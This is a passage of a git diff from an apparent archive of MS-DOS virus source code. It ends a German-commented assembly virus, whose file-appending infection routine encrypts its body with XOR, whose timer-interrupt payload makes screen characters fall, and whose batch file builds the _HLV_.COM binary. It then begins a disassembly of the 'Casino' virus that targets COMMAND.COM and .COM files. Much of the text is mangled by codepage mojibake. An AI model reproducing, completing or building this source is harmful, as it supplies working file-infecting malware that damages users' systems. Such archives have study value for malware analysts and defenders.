喊鞍鞍鞍鞍鞍昂 +ENDIF ; +ELSE ; +IF2 ; +%Out 喊鞍鞍鞍鞍鞍赏屯屯屯屯褪屯屯屯屯屯屯屯屯褪屯屯屯屯屯话鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍 Kommando '_HLV_' nicht implementiert. 喊鞍鞍鞍鞍鞍昂 +ENDIF ; +ENDIF ; +DISPNUM MACRO nu,nuxx ; +%Out 喊鞍鞍鞍鞍鞍 (Monat - Jahr) nu - nuxx 喊鞍鞍鞍鞍鞍昂 +ENDM ; +IF2 ; +%Out 喊鞍鞍鞍鞍鞍 Bis zum Jahresende aktiv ab: 喊鞍鞍鞍鞍鞍昂 +.radix 10 ; +DISPNUM %MONTH,%YEAR ; +.radix 16 ; +%Out 喊鞍鞍鞍鞍鞍韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯及鞍鞍鞍鞍鞍昂 +endif ; +XI_025: REST DS,ES,BP,DI,SI,DX,CX,BX,AX,F ;----------------; + JMP XI_014 ; +IF DEMO ; + ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Statt APPEND in der DEMO - Version aufgerufene Prozedur. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +DEMO_INFECT PROC NEAR ; + push ax ; + push cx ; + in al,61 ; + or al,3 ; + out 61,al ; + mov al,0b6 ; + out 43,al ; + mov cx,0a ; +XI_026: dec cx ; + jz XI_030 ; +XI_027: mov ax,200d ; +XI_028: dec ax ; + cmp ax,100d ; + jz XI_031 ; + push ax ; + out 42,al ; + push cx ; + mov cx,150d ; +XI_029: nop ; + loop XI_029 ; + pop cx ; + mov al,ah ; + out 42,al ; + pop ax ; + jmp XI_028 ; +XI_030: in al,61 ; + and al,0fc ; + out 61,al ; + pop cx ; + pop ax ; + ret ; +XI_031: inc ax ; + cmp ax,600d ; + jz XI_026 ; + push ax ; + out 42,al ; + push cx ; + mov cx,150d ; +XI_032: nop ; + loop XI_032 ; + pop cx ; + mov al,ah ; + out 42,al ; + pop ax ; + jmp XI_031 ; +DEMO_INFECT ENDP ; + ; +ELSE ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Append Virus - von der Int21ISR aufgerufene Infektions-Prozdur +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Append_Virus PROC NEAR ; + SAVE ES,BX ; + MOV AH,MS_AllocMem ;----------; + MOV BX,(OFFSET EOFC - OFFSET Crypt1) SHR 4 + 1 ; + MSDOS ;----------; + POP BX ; + JNB XI_034 ; +XI_033: STC ; + POP ES ; + RET ; +XI_034: MOV CS:[Crypt3],EnCrptd ; + MOV ES,AX ; + MOV_S DS,CS ; + XOR DI,DI ; + MOV SI,PSPsize ; + MOV CX,OFFSET EOFC ; + CLD ; + REPZ MOVSB ; + MOV DI,OFFSET XI_003 ; + MOV SI,OFFSET XR_001 ; + ADD SI,[File_Size_lsb] ; + MOV CX,OFFSET EOFC - OFFSET XI_003 ; +XI_035: XOR ES:[DI],SI ; + XOR ES:[DI],CX ; + INC DI ; + INC SI ; + LOOP XI_035 ; + MOV DS,AX ; + MOV AH,MS_Write ; + XOR DX,DX ; + MOV CX,OFFSET EOFC ; + MSDOS ; + SAVE F,AX ; + MOV AH,MS_ReleaseMem ; + MSDOS ; + REST AX,F ; + MOV_S DS,CS ; + JB XI_033 ; + CMP AX,CX ; + JNZ XI_033 ; + POP ES ; + CLC ; + RET ; +Append_Virus ENDP ; + ; +ENDIF ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + 'Zufallszahlen' - Generator. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Random PROC NEAR ; + SAVE DS ; + MOV_S DS,CS ; + SAVE BX,CX,DX,AX ; + MOV CX,7 ; + MOV BX,offset LastRandom ; + PUSH [BX] ; +XI_036: MOV AX,[BX-02] ; + ADC [BX],AX ; + DEC BX ; + DEC BX ; + LOOP XI_036 ; + POP AX ; + ADC [BX],AX ; + MOV DX,[BX] ; + POP AX ; + OR AX,AX ; + JZ XI_037 ; + MUL DX ; +XI_037: MOV AX,DX ; + REST DX,CX,BX,DS ; + RET ; +Random ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Zeichen und Attribut aus Videospeicher auslesen. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Load_from_VRAM PROC NEAR ; + SAVE SI,DS,DX ; + MOV AL,DH ; + MUL [Num_of_Col] ; + MOV DH,0 ; + ADD AX,DX ; + SHL AX,1 ; + ADD AX,[Page_offset] ; + MOV SI,AX ; + TEST [Prevent_Snow?],-1 ; + MOV DS,[Seg_of_VRAM] ; + JZ XI_038 ; + Wait_HRI_or_VRI ; +XI_038: LODSW ; + STI ; + REST DX,DS,SI ; + RET ; +Load_from_VRAM ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Zeichen und Attribut (AX) in den Videospeicher schreiben. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Write_to_VRAM PROC NEAR ; + SAVE DI,ES,DX,BX ; + MOV BX,AX ; + MOV AL,DH ; + MUL [Num_of_Col] ; + MOV DH,0 ; + ADD AX,DX ; + SHL AX,1 ; + ADD AX,[Page_offset] ; + MOV DI,AX ; + TEST [Prevent_Snow?],-1 ; + MOV ES,[Seg_of_VRAM] ; + JZ XI_039 ; + Wait_HRI_or_VRI ; +XI_039: MOV AX,BX ; + STOSB ; + STI ; + REST BX,DX,ES,DI ; + RET ; +Write_to_VRAM ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Bit 0 von Port B des 8255 Chips zur乧ksetzen (IO-Adresse : &H61 ). +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Toggle_Speaker PROC NEAR ; + PUSH AX ; + IN AL,PORT_B_8255 ; + XOR AL,02 ; + AND AL,0FE ; + OUT PORT_B_8255,AL ; + POP AX ; + RET ; +Toggle_Speaker ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + CF gesetzt, wenn AL ein nicht darstellbares Zeichen enth刲t. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Is_it_blank_? PROC NEAR ; + CMP AL,0 ; + JZ XI_040 ; + CMP AL,20 ; + JZ XI_040 ; + CMP AL,-1 ; + JZ XI_040 ; + CLC ; + RET ; +XI_040: STC ; + RET ; +Is_it_blank_? ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + CF gesetzt, wenn AL ein Zeichen aus dem Linienzeichensatz enth刲t. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Spec_Graphik? PROC NEAR ; + CMP AL,0B0 ; + JB XI_041 ; + CMP AL,0DF ; + JA XI_041 ; + STC ; + RET ; +XI_041: CLC ; + RET ; +Spec_Graphik? ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Geschwindigkeit der Maschine ( zur Verwendung in DELAY ) ermitteln. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +GetSysSpeed PROC NEAR ; + PUSH DS ; + MOV AX,BIOSDATASEG ; + MOV DS,AX ; + STI ; + MOV AX,[B_TIMERVAR] ; +XI_042: CMP AX,[B_TIMERVAR] ; + JZ XI_042 ; + XOR CX,CX ; + MOV AX,[B_TIMERVAR] ; +XI_043: INC CX ; + JZ XI_045 ; + CMP AX,[B_TIMERVAR] ; + JZ XI_043 ; +XI_044: POP DS ; + MOV AX,CX ; + XOR DX,DX ; + MOV CX,0F ; + DIV CX ; + MOV CS:[Speed],AX ; + RET ; +XI_045: DEC CX ; + JMP XI_044 ; +GetSysSpeed ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Verz攇ern ( Verz攇erungszeit ist kaum maschinenabh刵gig ). +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Delay PROC NEAR ; + PUSH CX ; +XI_046: PUSH CX ; + MOV CX,[Speed] ; +XI_047: LOOP XI_047 ; + POP CX ; + LOOP XI_046 ; + POP CX ; + RET ; +Delay ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Eine neue Interrupt 1C(h) Behandlungsroutine. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_048 LABEL NEAR ; +XR_009 EQU XI_048 + PSPsize ;----------; + TEST CS:[ISR_Flags],MASK R_in_1c OR MASK ExtCom ; + JZ XI_049 ;----------; + JMP XI_067 ; +XI_049: OR CS:[ISR_Flags],MASK R_in_1c ; + DEC CS:[XR_002] ; + JZ XI_050 ; + JMP XI_066 ; +XI_050: SAVE DS,ES ; + MOV_S DS,CS ; + MOV_S ES,CS ; + SAVE AX,BX,CX,DX,SI,DI,BP ; + MOV AL,EOI_8259A ; + OUT PORT_B_8259A,AL ; + MOV AX,[XR_003] ; + CMP AX,0438 ; + JNB XI_051 ; + MOV AX,0438 ; +XI_051: CALL Random ; + INC AX ; + MOV [XR_002],AX ; + MOV [XR_003],AX ; + PUSH DS ; + MOV AX,BIOSDATASEG ; + MOV DS,AX ; + MOV AX,[B_VidPage] ; + POP DS ; + MOV [Page_offset],AX ; + MOV [Last_Line],18 ; + MOV DL,-1 ; + MOV AX,1130 ; + MOV BH,0 ; + SAVE ES,BP ; + INT 10 ; + REST BP,ES ; + CMP DL,-1 ; + JZ XI_052 ; + MOV [Last_Line],DL ; +XI_052: CALL GetSysSpeed ; + MOV AH,0F ; + INT 10 ; + MOV [Num_of_Col],AH ; + MOV [Prevent_Snow?],0 ; + MOV [Seg_of_VRAM],MonoBase ; + CMP AL,07 ; + JZ XI_054 ; + JB XI_053 ; + JMP XI_064 ; +XI_053: MOV [Seg_of_VRAM],ColorBase ; + CMP AL,03 ; + JA XI_054 ; + CMP AL,02 ; + JB XI_054 ; + MOV [Prevent_Snow?],01 ; + MOV AL,[Last_Line] ; + INC AL ; + MUL [Num_of_Col] ; + MOV [Num_of_char],AX ; + MOV AX,[XR_004] ; + CMP AX,[Num_of_char] ; + JBE XI_054 ; + MOV AX,[Num_of_char] ; +XI_054: CALL Random ; + INC AX ; + MOV SI,AX ; +XI_055: XOR DI,DI ; +XI_056: INC DI ; + MOV AX,[Num_of_char] ; + SHL AX,1 ; + CMP DI,AX ; + JBE XI_057 ; + JMP XI_064 ; +XI_057: OR [ISR_Flags],MASK Recf_1 ; + MOV AL,[Num_of_Col] ; + MOV AH,0 ; + CALL Random ; + MOV DL,AL ; + MOV AL,[Last_Line] ; + MOV AH,0 ; + CALL Random ; + MOV DH,AL ; + CALL Load_from_VRAM ; + CALL Is_it_blank_? ; + JB XI_056 ; + CALL Spec_Graphik? ; + JB XI_056 ; + MOV [Last_Pair],AX ; + MOV CL,[Last_Line] ; + MOV CH,0 ; +XI_058: INC DH ; + CMP DH,[Last_Line] ; + JA XI_062 ; + CALL Load_from_VRAM ; + CMP AH,[Last_Attr] ; + JNZ XI_062 ; + CALL Is_it_blank_? ; + JB XI_060 ; +XI_059: CALL Spec_Graphik? ; + JB XI_062 ; + INC DH ; + CMP DH,[Last_Line] ; + JA XI_062 ; + CALL Load_from_VRAM ; + CMP AH,[Last_Attr] ; + JNZ XI_062 ; + CALL Is_it_blank_? ; + JNB XI_059 ; + CALL Toggle_Speaker ; + DEC DH ; + CALL Load_from_VRAM ; + MOV [Last_Char],AL ; + INC DH ; +XI_060: AND [ISR_Flags],NOT MASK Recf_1 ; + DEC DH ; + MOV AL,' ' ; + CALL Write_to_VRAM ; + INC DH ; + MOV AL,[Last_Char] ; + CALL Write_to_VRAM ; + JCXZ XI_061 ; + CALL Delay ; + DEC CX ; +XI_061: JMP XI_058 ; +XI_062: TEST [ISR_Flags],MASK Recf_1 ; + JZ XI_063 ; + JMP XI_056 ; +XI_063: CALL Toggle_Speaker ; + DEC SI ; + JZ XI_064 ; + JMP XI_055 ; +XI_064: IN AL,PORT_B_8255 ; + AND AL,0FC ; + OUT PORT_B_8255,AL ; + MOV AX,3 ; + CALL Random ; + INC AX ; + MUL [XR_004] ; + JNB XI_065 ; + MOV AX,-1 ; +XI_065: MOV [XR_004],AX ; + REST BP,DI,SI,DX,CX,BX,AX,ES,DS ; +XI_066: AND CS:[ISR_Flags],NOT MASK R_in_1c ; +XI_067: JMP DWORD PTR CS:[Org_Int_1C] ; + ; +IF SWITCHABLE ; + ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Implementierung eines neuen in CMD_2F definierten internen Befehls. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_068 Label Near ; +Int_2F_ISR EQU XI_068 + PSPsize ; + CMP AH,0AEH ; + JNZ Int_2F_end ; + CMP DX,-1 ; + JNZ Int_2F_end ; + CMP AL,0 ; + JNZ Int_2F_2nd ; + CALL Decode_2F ; + JNZ Int_2F_end ; + DEC AL ; + IRET ; +Int_2F_2nd: CMP AL,1 ; + JNZ Int_2F_end ; + CALL Decode_2F ; + JNZ Int_2F_end ; + SAVE DS,DX,AX ; + MOV_S DS,CS ; + XOR [ISR_Flags],MASK ExtCom ; + MOV DX,OFFSET MSG_ON ; + TEST [ISR_Flags],MASK ExtCom ; + JZ XI_069 ; + MOV DX,OFFSET MSG_OFF ; +XI_069: MOV AH,9 ; + MSDOS ; + REST AX,DX,DS ; + AND BYTE PTR [SI],0 ; + IRET ; +Int_2F_end: JMP DWORD PTR CS:[Org_Int_2F] ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + 歜erpr乫en, ob der in CMD_2F definierte Befehl angesprochen wurde. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Decode_2F PROC NEAR ; + SAVE SI,DI,ES,CX ; + MOV CX,05 ; + MOV_S ES,CS ; + MOV DI,OFFSET Cmd_2F ; + CLD ; + REPE CMPSW ; + REST CX,ES,DI,SI ; + RET ; +Decode_2F ENDP ; + ; +ENDIF ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Okay, das war's. Zum Schlu noch einige Definitionen. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +EOFC EQU THIS WORD ; +XR_010 EQU OFFSET EOFC - 1 + FIRSTBASE ; +TEXT ENDS ; +IF2 ;----------------; +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 韧屯屯屯 (C) 1990 164A12565AA18213165556D3125C4B962712 屯屯屯屯图 +ENDIF ; +comment # +赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 + + So k攏nte ein Batch - Makefile aussehen : + + @cls + @if %1.==. goto nopar + @if not exist %1.asm goto noasm + @ctty nul + @del %1.obj + @del %1.lst + @del %1.crf + @del %1.ref + @del %1.map + @del %1.exe + @del %1.bin + @del _HLV_.COM + @ctty con + @masm /b63 %1,,%1,%1 %2 %3 %4; + @if not exist %1.obj goto masm_err + @link %1,,%1; + @if not exist %1.exe goto link_err + @exe2bin %1; + @if not exist %1.bin goto exe2_err + @cref %1; + @if not exist %1.ref goto cref_err + @echo >> %1.lst + @copy %1.lst+%1.map+%1.ref %1.t > nul + @del %1.lst > nul + @ren %1.t %1.lst > nul + @del %1.obj > nul + @del %1.crf > nul + @del %1.ref > nul + @del %1.map > nul + @del %1.exe > nul + @echo n %1.bin > md.inp + @echo l 11f >> md.inp + @echo a 110 >> md.inp + @echo add cx,20 >> md.inp + @echo. >> md.inp + @echo g =110 113 >> md.inp + @echo f 110 11e 20 >> md.inp + @echo e 110 '%1' >> md.inp + @echo f 100 10f 90 >> md.inp + @echo a 100 >> md.inp + @echo jmp 120 >> md.inp + @echo nop >> md.inp + @echo nop >> md.inp + @echo nop >> md.inp + @echo mov ax,4c00 >> md.inp + @echo int 21 >> md.inp + @echo. >> md.inp + @echo n _HLV_.com >> md.inp + @echo w >> md.inp + @echo q >> md.inp + @debug < md.inp > nul + @cls + @echo. + @echo 赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 + @echo 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 + @echo 喊鞍鞍鞍MAKEHLV erfolgreich beendet, _HLV_.com wurde erstellt.鞍昂 + @echo 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 + @echo 韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯图 + @echo. + @goto ende + :nopar + @echo FEHLER ! Mindestens ein Parameter ist erforderlich ! + @echo Syntax : MAKEHLV asmfile [switches] + @goto ende + :noasm + @echo FEHLER ! Die Datei %1.ASM ist nicht zu finden ! + @goto ende + :masm_err + @echo FEHLER ! %1.OBJ konnte nicht erstellt werden ! + @goto ende + :link_err + @echo FEHLER ! %1.EXE konnte nicht erstellt werden ! + @goto ende + :exe2_err + @echo FEHLER ! %1.BIN konnte nicht erstellt werden ! + @goto ende + :cref_err + @echo FEHLER ! %1.REF konnte nicht erstellt werden ! + :ende + +韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯图 +# +END diff --git a/MSDOS/Virus.MSDOS.Unknown.casino.asm b/MSDOS/Virus.MSDOS.Unknown.casino.asm new file mode 100644 index 00000000..b88bc5fc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.casino.asm @@ -0,0 +1,1428 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CASINO 圹 +;圹 圹 +;圹 Created: 31-Aug-90 圹 +;圹 Version: 圹 +;圹 Passes: 9 Analysis Options on: H 圹 +;圹 Copyright S & S International, 1990 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_1e equ 60Ch ; (0000:060C=0) +data_2e equ 60Dh ; (0000:060D=0) +data_3e equ 60Eh ; (0000:060E=0) +data_4e equ 60Fh ; (0000:060F=0) +data_5e equ 610h ; (0000:0610=0) +data_6e equ 611h ; (0000:0611=0) +data_7e equ 612h ; (0000:0612=0) +data_8e equ 2 ; (6AE6:0002=0) +data_10e equ 3Bh ; (6AE6:003B=0) +data_11e equ 3Dh ; (6AE6:003D=0) +data_12e equ 3Fh ; (6AE6:003F=0) +data_13e equ 40h ; (6AE6:0040=0) +data_14e equ 41h ; (6AE6:0041=0) +data_15e equ 43h ; (6AE6:0043=6AE6h) +data_16e equ 45h ; (6AE6:0045=0) +data_17e equ 47h ; (6AE6:0047=6AE6h) +data_18e equ 4Dh ; (6AE6:004D=0) +data_19e equ 68h ; (6AE6:0068=0) +data_20e equ 7Eh ; (6AE6:007E=0) +data_21e equ 80h ; (6AE6:0080=0) +data_33e equ 716Eh ; (6AE6:716E=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +casino proc far + +start: + nop +data_23 db 0E9h +data_24 db 48h +data_25 db 7, 'ello - Copyright S & S Intern' + db 'ational, 1990', 0Ah, 0Dh, '$' + db 1Ah + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AA' + db 0E6h + db 'jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + +casino endp + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +; +; External Entry Point +; +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +int_24h_entry proc far + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + mov ah,9 + mov dx,offset data_25 ; (6AE6:0103=7) + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + int 20h ; Program Terminate + db 0, 0, 0, 0, 0, 0Fh + db 0, 0, 0E9h, 0D3h, 1, 0E9h + db 0, 0, 0, 90h, 0E9h, 78h + db 2Ah, 2Ah, 2Eh, 43h, 4Fh, 4Dh + db 0 + db 'C:\COMMAND.COM' + db 0, 43h, 4Fh, 4Dh, 4Dh, 41h + db 4Eh, 44h, 0FFh + db 2Eh, 43h, 4Fh, 4Dh + db 15 dup (0) + db 3Fh, 0, 0F0h, 3, 2, 0 + db 0B3h, 4Bh, 0FCh, 91h, 56h, 5 + db 79h, 10h, 0, 0, 0, 0 + db 0, 3 + db 8 dup (3Fh) + db 43h, 4Fh, 4Dh, 3Fh, 8, 0 + db 1Eh, 2, 2Eh, 8Bh, 26h, 68h + db 20h, 0A9h, 8Eh, 1Fh, 15h, 0E8h + db 3, 0, 0 + db 'H1000.COM' + db 9 dup (0) + db 1Fh, 15h, 0A9h, 8Eh, 90h, 90h + db 3Dh, 59h, 4Bh, 75h, 4, 0B8h + db 66h, 6, 0CFh, 80h, 0FCh, 11h + db 74h, 8, 80h, 0FCh, 12h, 74h + db 3, 0EBh, 51h, 90h 